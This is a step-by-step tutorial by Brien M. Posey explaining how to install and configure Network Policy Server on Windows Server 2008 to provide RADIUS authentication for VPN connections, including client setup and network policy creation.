The preferred method for authenticating and authorizing virtual private network (VPN) traffic has always been to use RADIUS authentication. Microsoft includes all of the necessary RADIUS authentication components with Windows Server but does not refer to RADIUS as RADIUS. In Windows Server 2003, Microsoft's flavor of RADIUS was known as the Internet Authentication Service, which was better known as IAS. In Windows Server 2008, RADIUS functionality is available through a Network Policy Server.
Deploying a Network Policy Server
The Network Policy Server is not something that's installed on your Windows Server 2008 by default. You have to enable it. To do so... ...open the Server Manager, and click on the Add Server Roles link. When prompted, select the Network Policy and Access Services role, and click Next. At this point, you should see an introductory screen that describes the services that you are about to install. Click Next to bypass this screen.
The next screen asks you which role services you want to install. Since our goal is to provide RADIUS authentication Windows 2008 for a VPN connection, choose the Network Policy Server option, as shown in Figure A.
Figure A: Choose the Network Policy Server option, and click Next.
Click to enlarge Network Policy Server image.
Click Next, and you should see a summary screen confirming that you are about to install the Network Policy and Access Services and the Network Policy Server role service. Assuming that everything appears to be correct, click the Install button. When the installation process completes, click Close.
Registering the Network Policy Server
Before you will be able to use the Network Policy Server to authenticate VPN connections, you will have to register the server in the Active Directory (the server should already be a domain member). To do so, choose the Network Policy Server command from the server's Administrative Tools menu. When the Network Policy Server (NPS) console opens, right-click on the NPS node and choose the Register Server in Active Directory option from the shortcut menu, as shown in Figure B.
Figure B: Choose the Register in Active Directory command.
Click to enlarge Active Directory image.
You should now see a prompt informing you that before the Network Policy Server can be used to authenticate Active Directory users, it must be authorized to read user's dial-in properties. The dialog box then goes on to ask if you want to grant the necessary authorization. Click OK. When you do, you should receive confirmation that the server is now authorized to read user's dial in properties from the domain. Click OK to clear this message.
Although connection request logging is enabled by default, it's a good idea to go ahead and verify that logging is indeed enabled. To do so, right-click on NPS node and choose the Properties command from that shortcut menu. When you do, you will see the Network Policy Server (Local) Properties sheet, shown in Figure C.
Figure C: Verify that logging is enabled.
Click to enlarge enabled logging image.
Take a moment to verify that Rejected Authentication Requests and Successful Authentication Requests are both selected. Next, select the Ports tab. The ports should be filled in automatically, but you should verify that the server is using Ports 1812 and 1645 for authentication. It should also be using Ports 1813 and 1646 for accounting.
Set up a RADIUS client
Now we need to set up a RADIUS client. The RADIUS client is the device that forwards the request to our Network Policy Server. To set up a RADIUS client, navigate through the console tree to Network Policy Server | RADIUS Clients and Servers | RADIUS Clients. Now, right click on the RADIUS Clients node, and select the New command from the shortcut menu. Then you should see the dialog box shown in Figure D.
Figure D: You must configure a RADIUS client.
Click to enlarge RADIUS client image.
At its simplest, you must provide a friendly name for the RADIUS client and specify its IP address. You must also provide a shared secret that is to be shared between the Network Policy Server and the RADIUS client.
The last step in the process is to set up a network policy. To do so, navigate through the console tree to NPS | Policies | Network Policies. When you select the Network Policies container, you will see two default policies, which you can ignore. At this point, right click on the Network Policies container and select the New command from the shortcut menu.
Windows will now launch the new Network Policy wizard. Enter a name for the policy you are creating, and set the Type of Network Access Server option to Remote Access Server (VPN-Dial Up).
Click Next, and the wizard will display the Conditions screen. You must specify at least one condition that will determine whether or not the policy will be evaluated for network requests. To do so, click Add and then select the condition that you want to use. As you can see in Figure E, there are too many conditions available to include in one screen capture.
Figure E: You must select a condition.
Click to enlarge RADIUS condition selection image.
Although there are options for evaluating a connection based on security group membership, VPN connections are most commonly evaluated based on tunnel type. That way, you can be sure that the policy will only be applied to VPN clients. Of course the actual conditions that you choose must be based on your own requirements.
Regardless of your choice, you will be asked to provide some information about the condition. For example, if you choose to use the Tunnel Type option, then you will be required to choose the types of tunnels to which the policy should be applied, as shown in Figure F.
Figure F: Choose the type of tunnel to which the policy should be applied.
Click to enlarge tunnel type image.
When you have finished setting up your conditions, click Next. Windows will now display the wizard's Specify Access Permission screen, shown in Figure G. This is where you choose whether connections matching the conditions that you have specified should be granted or denied access. Normally, you should use the Access is determined by User Dial-iIn properties option.
Figure G: Choose to grant or deny access to connections matching the specified conditions.
Click to enlarge access to connections image.
Click Next, and you will be taken to the Configure Constraints screen. Use this screen to set idle timeouts, time of day restrictions and things like that. Make any desired settings and click Next.
You should now see a screen that allows you to send optional additional attributes to RADIUS clients. In most cases, you probably won't have to do anything on this screen unless you are operating non-Windows RADIUS servers that require additional attributes. This screen primarily exists for those who are going to be using Network Access Protection or RADIUS clients with special requirements. Since we do not need to add additional attributes, just click Next.
Windows will now display a summary of the configuration options that you have specified. Assuming that everything appears correctly, click Finish to complete the configuration process.
Concluding your Windows 2008 RADIUS authentication
As you can see, implementing RADIUS authentication Windows 2008 for a VPN is fairly straightforward. However, this procedure is not one size fits all. Depending on your own individual requirements, you may have to perform additional steps.
|Brien M. Posey|
About the author:
Brien M. Posey, MCSE, is a Microsoft Most Valuable Professional for his work with Windows 2000 Server and IIS. Brien has served as CIO for a nationwide chain of hospitals and was once in charge of IT security for Fort Knox. As a freelance technical writer, he has written for Microsoft, CNET, ZDNet, TechTarget, MSD2D, Relevant Technologies and other technology companies. You can visit Brien's personal website at www.brienposey.com.